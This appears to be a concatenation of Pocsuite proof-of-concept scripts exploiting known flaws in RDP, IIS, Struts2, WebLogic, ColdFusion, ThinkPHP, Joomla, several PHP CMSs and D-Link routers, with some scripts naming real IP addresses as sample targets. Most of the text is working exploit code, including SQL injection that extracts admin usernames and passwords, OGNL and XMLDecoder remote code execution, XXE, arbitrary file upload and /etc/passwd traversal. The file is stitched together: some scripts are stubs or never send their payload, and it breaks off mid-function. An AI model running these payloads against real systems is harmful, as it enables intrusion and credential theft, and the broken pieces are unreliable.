#!/usr/bin/env python
# coding: utf-8
import socket
import struct
import sys
from binascii import hexlify, unhexlify
from urllib.parse import urlparse
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE


class TestPOC(POCBase):
    vulID = '0'
    version = '1.0'
    author = 'hancool'
    vulDate = '2019-1-9'
    createDate = '2019-1-9'
    updateDate = '2019-1-9'
    references = ['https://gist.github.com/DavidWittman/2312547', ]
    name = 'MS12-020/CVE-2012-0002 Vulnerability Tester'
    appPowerLink = 'https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-020'
    appName = 'RDP'
    appVersion = 'All'
    vulType = VUL_TYPE.CODE_EXECUTION
    category = POC_CATEGORY.EXPLOITS.DOS
    desc = '''
    MS12-020/CVE-2012-0002 Vulnerability Tester
    based on sleepya's version @ http://pastebin.com/Ks2PhKb4
    '''

    def _verify(self):
        # reference from https://gist.github.com/DavidWittman/2312547
        def exploit(host, port):
            # See http://msdn.microsoft.com/en-us/library/cc240836%28v=prot.10%29.aspx
            connection_request = unhexlify(''.join([
                "0300",     # TPKT Header version 03, reserved 0
                "0013",     # Length
                "0e",       # X.224 Data TPDU length
                "e0",       # X.224 Type (Connection request)
                "0000",     # dst reference
                "0000",     # src reference
                "00",       # class and options
                "01",       # RDP Negotiation Message
                "00",       # flags
                "0800",     # RDP Negotiation Request Length
                "00000000"  # RDP Negotiation Request
            ]))

            initial_pdu = unhexlify(''.join([
                "03000065",  # TPKT Header
                "02f080",   # Data TPDU, EOT
                "7f655b",   # Connect-Initial
                "040101",   # callingDomainSelector
                "040101",   # calledDomainSelector
                "0101ff",   # upwardFlag
                "3019",     # targetParams + size (25 bytes)
                "020122",  # maxChannelIds
                "020120",  # maxUserIds
                "020100",  # maxTokenIds
                "020101",  # numPriorities
                "020100",  # minThroughput
                "020101",  # maxHeight
                "0202ffff",  # maxMCSPDUSize
                "020102",  # protocolVersion
                "3018",     # minParams + size (24 bytes)
                "020101",  # maxChannelIds
                "020101",  # maxUserIds
                "020101",  # maxTokenIds
                "020101",  # numPriorities
                "020100",  # minThroughput
                "020101",  # maxHeight
                "0201ff",  # maxMCSPDUSize
                "020102",  # protocolVersion
                "3019",     # maxParams + size (25 bytes)
                "0201ff",  # maxChannelIds
                "0201ff",  # maxUserIds
                "0201ff",  # maxTokenIds
                "020101",  # numPriorities
                "020100",  # minThroughput
                "020101",  # maxHeight
                "0202ffff",  # maxMCSPDUSize
                "020102",  # protocolVersion
                "0400",     # userData
            ]))

            user_request = unhexlify(''.join([
                "0300",  # header
                "0008",  # length
                # X.224 Data TPDU (2 bytes: 0xf0 = Data TPDU, 0x80 = EOT)
                "02f080",
                "28",  # PER encoded PDU contents
            ]))

            channel_join_request = unhexlify("0300000c02f08038")
            skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            skt.settimeout(10)
            skt.connect((host, port))
            skt.send(connection_request)
            data = skt.recv(8192)
            if data != unhexlify("0300000b06d00000123400") \
                    and data != unhexlify("030000130ed000001234000201080000000000"):
                return (False, "ERROR: This isn't RDP")
                #raise SystemExit(1)
            skt.send(initial_pdu)

            # Send attach user request
            skt.send(user_request)
            data = skt.recv(8192)
            user1 = data[9:11]

            # Send another attach user request
            skt.send(user_request)
            data = skt.recv(8192)
            user2_int = int(hexlify(data[9:11]), base=16)
            user2 = struct.pack('!H', user2_int + 1001)

            # Send channel join request
            skt.send(channel_join_request + user1 + user2)
            data = skt.recv(8192)
            if data[7:9] == b"\x3e\x00":
                """ 0x3e00 indicates a successful join; this service is vulnerable """
                return (True, "This device is vulnerable")
                # Complete request to prevent BSOD
                skt.send(channel_join_request +
                         struct.pack('!H', user2_int) + user2)
                data = skt.recv(8192)
            else:
                # Patched
                return (False, "This device is not vulnerable to MS12-020.")

            skt.close()

        result = {}
        pr = urlparse(self.url)
        if pr.port:  # and pr.port not in ports:
            ports = [pr.port]
        else:
            ports = [3389, 13389, 23389]
        for port in ports:
            try:
                status, msg = exploit(pr.hostname, port)
                if status:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = '{}:{}'.format(
                        pr.hostname, port)
                    break
            except:
                # raise
                pass

        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output


register_poc(TestPOC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = 'example1'  # vul ID
    version = '1'
    author = 'test'
    vulDate = '2014-04-08'
    createDate = '2014-04-08'
    updateDate = '2014-04-08'
    references = ['http://drops.wooyun.org/papers/1381']
    name = 'Openssl 1.0.1 内存读取 信息泄露漏洞'
    appPowerLink = 'www.openssl.org'
    appName = 'OpenSSL'
    appVersion = '1.0.1~1.0.1f, 1.0.2-beta, 1.0.2-beta1'
    vulType = 'Information Disclosure'
    desc = '''
        OpenSSL是一个强大的安全套接字层密码库。
        这次漏洞被称为OpenSSL“心脏出血”漏洞，
        这是关于 OpenSSL 的信息泄漏漏洞导致的安全问题。
        它使攻击者能够从内存中读取最多64 KB的数据。
        安全人员表示：无需任何特权信息或身份验证，
        我们就可以从我们自己的（测试机上）偷来X.509证书的私钥、
        用户名与密码、聊天工具的消息、电子邮件以及重要的商业文档和通信等数据。
    '''
    # the sample sites for examine
    samples = ['http://www.baidu.com', 'http://www.qq.com']

    def _attack(self):
        response = req.get(self.url, headers={"referer": '123123321'}, timeout=10)
        return self.parse_attack(response)

    def _verify(self):
        return self._attack()

    def parse_attack(self, response):
        output = Output(self)
        result = {}
        if response:
            result['FileInfo'] = {}
            result['FileInfo']['Filename'] = response
            result['FileInfo']['Filecontent'] = 'test123' * 10
            output.success(result)
        else:
            output.fail('Internet Nothing returned')
        return output


register(TestPOC)



#!/usr/bin/python
# -*- coding: utf-8 -*-


# If you have issues about development, please read:
# https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md
# https://github.com/knownsec/Pocsuite/blob/master/docs/COPYING

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re


def send_command(url):
	try:
		httpreq = req.Session()
		headers ={
		"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
		"Accept-Encoding": "gzip, deflate",
		"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
		"Connection": "close",
		"Cookie": "_gauges_unique_month=1; _gauges_unique_year=1; _gauges_unique=1; _gauges_unique_hour=1; _gauges_unique_day=1",
		"Host": "httpbin.org",
		"Referer": "http://httpbin.org/",
		"Upgrade-Insecure-Requests": "1",
		"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
		 }


		resp = httpreq.get(url, headers=headers)
	except:
		resp = None
	return resp


class TestPOC(POCBase):
	name = 'phpaacms 4.0 Sql 注入0day漏洞'.decode('utf-8')
	vulID = '0'
	author = ['小雨']
	vulType = 'sql_inj'
	version = '1.0'  # default version: 1.0
	references = ['https://www.webshell.cc/7.html']
	desc = '''phpaacms 4.0 Sql 注入0day漏洞'''
	createDate = '2017.12.20'
	appName = 'phpaacms'
	appVersion = '4.0'


	def _attack(self):
		'''attack mode'''
		result = {}
		self.url = self.url + "/search.php?id=1+and(select+1+from(select+count(*),concat((select+(select+(SELECT+concat(phpaacms_users.username,0x23,password)+FROM+`phpaa`.phpaacms_users+LIMIT+1,1)+)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1"

		resp = send_command(self.url)
		if resp and resp.text and resp.status_code == 200:
			info = re.findall(r'entry \'(.+?)\' for', resp.text)
			if len(info) > 0:
				info1 = info[0].split('#')
				result['Database'] = {}
				result['Database']['user'] = info1[0]
				result['Database']['password'] = info1[1]


		return self.parse_output(result)

	def _verify(self):
		'''verify mode'''
		return self._attack()

	def parse_output(self, result):
		output = Output(self)
		if result:
			output.success(result)
		else:
			output.fail('Internet nothing returned')
		return output


register(TestPOC)



#!/usr/bin/env python
# coding: utf-8

import urllib
import random
import string
from collections import OrderedDict

from pocsuite.api.request import req  #用法和 requests 完全相同
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class TestPOC(POCBase):
    PocName = 'iis_ms15_034_exec '
    vulID = '89233'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1'  #默认为1
    author = 'lyb'  #  PoC作者的大名
    vulDate = '2018/6/7'  #漏洞公开的时间,不知道就写今天
    createDate = '2018/6/7'  # 编写 PoC 的日期
    updateDate = '2018/6/7'  # PoC 更新的时间,默认和编写时间一样
    references = [
        'https://technet.microsoft.com/library/security/ms15-034']  # 漏洞地址来源,0day不用写
    name = 'iis http.sys ms15-034漏洞 PoC'  # PoC 名称
    appPowerLink = 'https://www.microsoft.com/'  # 漏洞厂商主页地址
    appName = 'iis'  # 漏洞应用名称
    appVersion = '7.5'  # 漏洞影响版本
    vulType = 'Command Execution'  #漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中，当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
    '''  # 漏洞简要描述
    samples = []  # 测试样列,就是用 PoC 测试成功的网站
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        self.url = self.url
        headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; rv:30.0) Gecko/20150101 Firefox/32.0",
                   "Accept-Encoding": "gzip, deflate",
                   "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                   "Range": "bytes=0-18446744073709551615",
                   "Referer": "https://github.com/zigoo0/",
                   "Connection": "keep-alive"
                   }
        r = req.get(self.url, headers=headers, verify=False, timeout=5)
        if r.status_code == 416 or "Requested Range Not Satisfiable" in r.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# coding: utf-8
# import os
import random
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class TestPOC(POCBase):
    vulID = '91857'  # ssvid
    version = '1.0'
    author = ['']
    vulDate = ''
    createDate = '2016-06-15'
    updateDate = '2016-06-15'
    references = ['http://www.seebug.org/vuldb/ssvid-91857']
    name = 'Struts2 方法调用远程代码执行漏洞(S2-037)'
    appPowerLink = 'http://struts.apache.org/'
    appName = 'Apache Struts'
    appVersion = ''
    vulType = 'Code Execution'
    desc = '''
    '''
    samples = ['']
    install_requires = ['']

    def _attack(self):
        return self._verify()

    def _verify(self):
        result = {}
        # payload = "http://172.16.176.226:8080/struts2-rest-showcase/orders/3"
        rand_num1 = random.randint(300, 3000)
        rand_num2 = random.randint(600, 6000)
        result_str = str(rand_num1) + str(rand_num2)
        payload = "/%28%23yautc5yautc%3D%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3F"
        payload += "@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29.print%28"
        payload += "%23parameters.t1[0]%2B%23parameters.t2[0]%29%3Aindex.xhtml?t1={}&t2={}".format(
            rand_num1, rand_num2)

        payload_url = self.url + payload
        response = req.get(payload_url)
        if result_str in response.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = response.url
        # Write your code here

        return self.parse_output(result)

    def parse_output(self, result):
        # parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# coding: utf-8
import random
import string
import time
from urllib.parse import urlparse
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE


class TestPOC(POCBase):
    vulID = '0'
    version = '1.0'
    author = 'hancool'
    vulDate = '2017-10-23'
    createDate = '2017-12-22'
    updateDate = '2017-12-22'
    references = [
        'https://www.seebug.org/vuldb/ssvid-97009',
    ]
    name = 'Oracle WebLogic wls-wsat RCE(CVE-2017-10271)'
    appPowerLink = 'https://www.oracle.com/middleware/weblogic/index.html'
    appName = 'WebLogic'
    appVersion = 'All'
    vulType = VUL_TYPE.CODE_EXECUTION
    category = POC_CATEGORY.EXPLOITS.REMOTE
    desc = '''
    Oracle Fusion Middleware（Oracle融合中间件）是美国甲骨文（Oracle）公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。
Oracle Fusion Middleware中的Oracle WebLogic Server组件的WLS Security子组件存在安全漏洞。攻击者可利用该漏洞控制组件，影响数据的可用性、保密性和完整性。以下组版本受到影响：Oracle WebLogic Server 10.3.6.0.0版本，12.1.3.0.0版本，12.2.1.1.0版本，12.2.1.2.0版本。

    '''

    def _verify(self):
        flag = "".join(random.choice(string.ascii_letters)
                       for _ in range(0, 8))
        output_file = '{}.txt'.format(flag)
        '''
        payload的格式化
        '''
        def payload_command():
            command_filtered = "<string>{}</string>".format(flag)
            payload_1 = '''
            <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
            <soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java>
            <java version="1.6.0" class="java.beans.XMLDecoder">
            <object class="java.io.PrintWriter">
            <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/{}</string>
            <void method="println">{}</void><void method="close"/>
            </object>
            </java>
            </java>
            </work:WorkContext>
            </soapenv:Header><soapenv:Body/></soapenv:Envelope>'''.format(output_file, command_filtered)
            return payload_1

        '''
        检查结果
        '''
        def verify_result(target):
            headers = {
                'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'}
            # url增加时间戳避免数据是上一次的结果缓存
            output_url = '{}/bea_wls_internal/{}?{}'.format(
                target, output_file, int(time.time()))
            try:
                r = req.get(output_url, headers=headers)
                if r.status_code == req.codes.ok and flag in r.text:
                    return (True, 'success')
                elif r.status_code == 404:
                    return (False, '404 no output')
                else:
                    return (False, r.status_code)
            except req.exceptions.ReadTimeout:
                return (False, 'timeout')
            except Exception as ex:
                # raise
                return (False, str(ex))

        '''
        RCE POC
        '''
        def weblogic_rce(target):
            url = '{}/wls-wsat/CoordinatorPortType'.format(target)
            # content-type必须为text/xml
            payload_header = {'content-type': 'text/xml',
                              'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'}
            try:
                r = req.post(url, payload_command(),
                             headers=payload_header, verify=False)
                # 500时说明已成功反序列化执行命令
                if r.status_code == 500:
                    return verify_result(target)
                elif r.status_code == 404:
                    return (False, '404 no vulnerability')
                else:
                    return (False, '{} something went wrong'.format(r.status_code))
            except req.exceptions.ReadTimeout:
                return (False, 'timeout')
            except Exception as ex:
                # raise
                return (False, str(ex))

        '''
        verify:
        '''
        result = {}
        pr = urlparse(self.url)
        if pr.port:  # and pr.port not in ports:
            ports = [pr.port]
        else:
            ports = [7001, 17001, 27001]
        for port in ports:
            uri = "{0}://{1}:{2}".format(pr.scheme, pr.hostname, str(port))
            status, msg = weblogic_rce(uri)
            if status:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = uri
                break

        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output


register_poc(TestPOC)



#!/usr/bin/python
# -*- coding:utf-8 -*-

import string
import random
import time
import re
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    name = '74cms 3.4  plus/weixin.php sql injection'
    vulID = '0'
    author = ['LRestless']
    vulType = 'sql-inj'
    version = '1'
    references = ['https://shuimugan.com/bug/view?bug_no=68941']
    desc = '''74cms 3.4  plus/weixin.php sql injection'''

    vulDate = '2014-10-16'
    createDate = '2019-04-02'
    updateDate = '2019-04-02'

    appName = '74cms'
    appVersion = '3.4'
    appPowerLink = 'http://www.74cms.com'
    samples = ['re']

    def _attack(self):
        """attack mode"""
        result = {}
        s = req.Session()
        s.get(self.url)
        self.url = self.url.strip('/') + "/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709&timestamp=&nonce="
        data = """<?xml version="1.0" encoding="utf-8"?>
            <!DOCTYPE copyright [
            <!ENTITY test SYSTEM "file:///">
            ]>
            <xml>
            <ToUserName>&test;</ToUserName>
            <FromUserName>1111</FromUserName>
            <Content>2222' union select concat(0x7e,database(),0x7e) #</Content>
            <Event>3333</Event>
            </xml>
        """
        header = {
            'Content-Type': 'text/xml'
        }
        resp1 = s.post(self.url, headers=header, data=data)
        dbname1 = re.search('~(.*?)~', resp1.content)
        if dbname1:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['Database'] = {}
            result['Database']['DBname'] = dbname1.group(1)
        return self.parse_output(result)

    def _verify(self):
        """verify  mode"""
        result = {}
        s = req.Session()
        s.get(self.url)
        self.url = self.url.strip('/') + "/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709&timestamp=&nonce="
        data = """<?xml version="1.0" encoding="utf-8"?>
            <!DOCTYPE copyright [
            <!ENTITY test SYSTEM "file:///F:/wwwroot/Apache2/htdocs/74cms/robots.txt">
            ]>
            <xml>
            <ToUserName>&test;</ToUserName>
            <FromUserName>1111</FromUserName>
            <Content>2222' union select md5(1) #</Content>
            <Event>3333</Event>
            </xml>
        """
        header = {
            'Content-Type': 'text/xml'
        }
        resp1 = s.post(self.url, headers=header, data=data)
        time.sleep(2)
        if '(c4ca4238a0b923820dcc509a6f75849' in resp1.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)




#!/usr/bin/env python
# coding: utf-8
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
from pocsuite.api.utils import randomStr
from urlparse import urlparse, urljoin


class TestPOC(POCBase):
    vulID = '97671'
    version = '1.0'
    author = 'fairy'
    vulDate = '2018-11-09'
    createDate = '2019-8-30'
    updateDate = '2019-8-30'
    references = ['https://www.seebug.org/vuldb/ssvid-97671']
    name = 'Adobe ColdFusion 任意文件上传漏洞'
    appPowerLink = 'https://www.adobe.com/products/coldfusion-family.html'
    appName = 'Adobe ColdFusion'
    appVersion = ''
    vulType = '任意文件上传'
    desc = '''
    Adobe ColdFusion 中存在安全漏洞，该漏洞源于程序未限制文件的上传。攻击者可利用该漏洞上传恶意文件，从而执行恶意代码。
    '''
    samples = ['https://www.vendelaredos.com/']
    install_requires = []

    def _verify(self):
        '''verify mode'''
        result = {}
        if urlparse(self.url).port is None:
            self.url = self.url+":8500"
        url = urljoin(self.url, '/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm')
        filename = randomStr(6)
        content = randomStr(12)

        data = "-----------------------------24464570528145\r\n"
        data += "Content-Disposition: form-data; name=\"file\"; filename=\"{filename}\"\r\n".format(
            filename=filename)
        data += "Content-Type: image/jpeg\r\n"
        data += "\r\n"
        data += "{content}\r\n".format(content=content)
        data += "-----------------------------24464570528145\r\n"
        data += "Content-Disposition: form-data; name=\"path\"\r\n"
        data += "\r\n"
        data += "we\r\n"
        data += "-----------------------------24464570528145--\r\n"

        header = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36",
            "Content-Type": "multipart/form-data; boundary=---------------------------24464570528145"
        }
        req.post(url, headers=header, data=data)

        file_path = "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/" + filename
        file_url = urljoin(self.url, file_path)
        response = req.get(file_url)
        if content in response.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Shell'] = file_url

        return self.parse_output(result)

    _attack = _verify

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
#!coding: utf-8
import re
import sys
from bs4 import BeautifulSoup

from pocsuite.net import req
from pocsuite.poc import POCBase,Output
from pocsuite.utils import register

class Fuckdede(POCBase):
	vulID='2'
	version = '1'
	author = ['fengxuan']
	vulDate = '2016-2-13'
	createDate = '2016-2-13'
	updateDate = '2016-2-13'
	references = ['http://www.evalshell.com', 'http://www.moonsec.com/post-13.html']
	name = 'dedecms plus/guestbook.php 注入漏洞利用EXP'
	appPowerLink = 'http://www.dedecms.cn/'
	appName = 'dedecms'
	appVersion = '5.7'
	vulType = 'SQL Injection'
	desc = '''
           开发人员在修补漏洞的时候只修复了少数的变量而遗漏了其他变量，使其他变量直接
           带入了SQL语句中，可以通过\字符来转义掉一个单引号，逃逸单引号，产生SQL注入。
           此注入为报错注入，可以通过UpdateXML函数进行注入。
    '''
	samples = ['']

	def _verify(self):
		result = {}
		target = self.url + "/plus/guestbook.php"
		response = req.get(target)
		content = response.content
		soup = BeautifulSoup(content, 'lxml')
		msgid = None
		for line in soup.findAll('a'):
			if line.get('href').startswith('guestbook.php?action=admin'):
				msgid = line.get('href')[30:]
				break
		if msgid == None:
			print("No msgid find,don't fuck this vulu")
		payload = self.url + "/plus/guestbook.php?action=admin&job=editok&id={0}&msg=',msg=user(),email='".format(msgid)
		req.get(target)
		target = self.url + "/plus/guestbook.php"
		response = req.get(target)
		content = response.content
		for line in soup.findAll('td', attrs={'class':'msgtd'}):
			if line.text.find('@localhost') >= 0:
				result = {'VerifyInfo':{}}
				result['VerifyInfo']['URL'] = self.url
				return self.parse_result(result)

	def _attack(self):
		return self._verify()

	def parse_result(self, result):
		output = Output(self)

		if result:
			output.success(result)
		else:
			output.fail("Internet Nothing returned")
		return output

register(Fuckdede)







#!/usr/bin/python
# -*- coding: utf-8 -*-
import re
import hashlib
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.lib.core.data import logger
from pocsuite.api.poc import Output, POCBase
from pocsuite.api.utils import randomStr
from pocsuite.lib.core.enums import CUSTOM_LOGGING
from urlparse import urljoin


class TestPOC(POCBase):
    vulID = ''
    version = ''
    author = 'luckybool1020'

    def get_pass(self, joomla_session):
        if any(para not in self.params for para in ['user', 'passwd']):
            logger.log(
                CUSTOM_LOGGING.SYSINFO,
                "You can use --extra-params=\"{'user': 'xxx','passwd': 'xxx'}\" to exec command")
            return self.parse_output(None)
        else:
            user, passwd = self.params['user'], self.params['passwd']
        url = urljoin(self.url, '/administrator/index.php')
        content = joomla_session.get(url).content
        re_para = '<input type="hidden" name="return" value="(.*?)"/>.*<input type="hidden" name="(.*?)" value="1" />'
        match = re.findall(re_para, content, re.S)
        if match:
            value, token = match[0][0], match[0][1]
        else:
            return self.parse_output(None)
        self.headers = {
            "Content-Type": "application/x-www-form-urlencoded"
        }
        pass_payload = 'username={user}&passwd={passwd}&option=com_login&task=login&return={value}&{token}=1'.format(
            user=user, passwd=passwd, value=value, token=token)
        joomla_session.post(
            url=url, params=None, headers=self.headers, data=pass_payload)

    def _verify(self):
        '''verify mode'''
        result = {}
        joomla_session = req.session()
        self.get_pass(joomla_session)
        rand_str = randomStr(10, "0123456789")
        url = urljoin(self.url, '/administrator/index.php?option=com_users&view=notes')
        sqli_payload = 'filter[search]=&list[fullordering]=a.review_time DESC&list[limit]=20&filter[published]=1&filter[category_id]=(updatexml(2,concat(0x7e,(md5({randstr}))),0))'.format(
            randstr=rand_str)
        r = joomla_session.post(url=url, headers=self.headers, data=sqli_payload)
        if r.status_code == 500 and hashlib.md5(rand_str).hexdigest()[
                0:31] in r.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
        return self.parse_output(result)

    _attack = _verify

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/python
# -*- coding: utf-8 -*-

import string
import time
from pocsuite.api.request import req #用法和 requests 完全相同
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
from pocsuite.api.utils import randomStr


class TestPOC(POCBase):
    name = 'ThinkPHP5 5.0.23 Remote Code Execution'
    vulID = '1'  # https://www.seebug.org/vuldb/ssvid-93077
    author = ['liujun']
    vulType = 'cmd-exec'
    version = '1.0'    # default version: 1.0
    references = ['https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce']
    desc = '''ThinkPHP5 5.0.23 Remote Code Execution'''

    vulDate = '2019-01-11'
    createDate = '2019-03-23'
    updateDate = '2019-03-23'

    appName = 'Thinkphp'
    appVersion = '5.0.23'
    appPowerLink = 'http://www.thinkphp.cn/'
    samples = ['']


    def _attack(self):
        """attack mode"""
        return self._verify()

    def _verify(self):
        """verify mode"""
        result = {}
        self.url = self.url + '/index.php?s=captcha'
        token = randomStr()
        cmd = "echo {}".format(token)
        headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        }
        exploitdata = {'_method':'__construct','filter[]':'system','method':'get','server[REQUEST_METHOD]':cmd}
        matchstring = 'system error'

        resp = req.post(self.url,data=exploitdata,headers=headers)

        if matchstring in resp.content.lower() and token in resp.content :
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import httplib
import urlparse


class TestPOC(POCBase):
    vulID = '90225'  # ssvid
    version = '1.0'
    author = ['Magic']
    vulDate = '2015-06-09'
    createDate = '2016-05-31'
    updateDate = '2016-05-31'
    references = ['http://www.wooyun.org/bugs/wooyun-2016-0181869']
    name = 'D-Llink某处无需登录文件包含'
    appPowerLink = 'http://www.dlink.com.cn'
    appName = 'D-Link'
    appVersion = 'DSR-250N'
    vulType = 'File Inclusion'
    desc = '''   
    D-Link File Inclusion
    '''
    samples = ['http://176.62.84.70:8080/','http://178.237.184.210:8080/']

    def _attack(self):
        return self._verify()

    def _verify(self):
        httpClient = None
        result = {}
        result['VerifyInfo'] = {}
        arr = urlparse.urlparse(self.url)
        target = arr.hostname
        port = arr.port
        if not port:
            port = 8080
        try:
            payload = 'thispage=../../../../../../../../../../etc/passwd%00.htm&Users.UserName=admin%2F*&Users.Password=admin&button.login.Users.deviceStatus=Login&Login.userAgent=Mozilla%2F5.0+%28Windows+NT+10.0%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F48.0.2564.116+Safari%2F537.36'
            headers = {'Origin': 'http://127.0.0.1:8080', 'Content-Length': '287', 'Accept-Language': 'zh-CN,zh;q=0.8', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'Keep-Alive', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Upgrade-Insecure-Requests': '1', 'Host': '176.62.84.70', 'Referer': 'http://127.0.0.1:8080/', 'Cache-Control': 'max-age=0', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36', 'Content-Type': 'application/x-www-form-urlencoded'}

            httpClient = httplib.HTTPConnection(target, port)
            httpClient.request('POST', '/platform.cgi', payload, headers=headers)
            res = httpClient.getresponse()

            if res.status == 200 and '/bin/sh' in res.msg:
                result['VerifyInfo']['URL'] = self.url
            return self.parse_attack(result)
        except Exception, e:
            raise e
        finally:
            if httpClient:
                httpClient.close()

    def parse_attack(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


#!/usr/bin/env python
# coding: utf-8
import xmlrpc.client
from urllib.parse import urlparse
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE


class TestPOC(POCBase):
    vulID = ''
    version = '1.0'
    author = 'kcat'
    vulDate = '2017-7-24'
    createDate = '2020-2-20'
    updateDate = '2020-2-20'
    references = [
        'https://github.com/vulhub/vulhub/tree/master/supervisor/CVE-2017-11610']
    name = 'CVE-2017-11610 Supervisord 远程命令执行漏洞'
    appPowerLink = ''
    appName = 'Supervisord'
    appVersion = '3.x'
    vulType = VUL_TYPE.CODE_EXECUTION
    category = POC_CATEGORY.EXPLOITS.REMOTE
    desc = '''
    The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 
    allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, 
    related to nested supervisord namespace lookups.
    利用 https://github.com/vulhub/vulhub/tree/master/supervisor/CVE-2017-11610 中的'poc.py'来检测是否存在漏洞
    '''

    def _verify(self):
        result = {}
        pr = urlparse(self.url)
        if pr.port:
            ports = [pr.port]
        else:
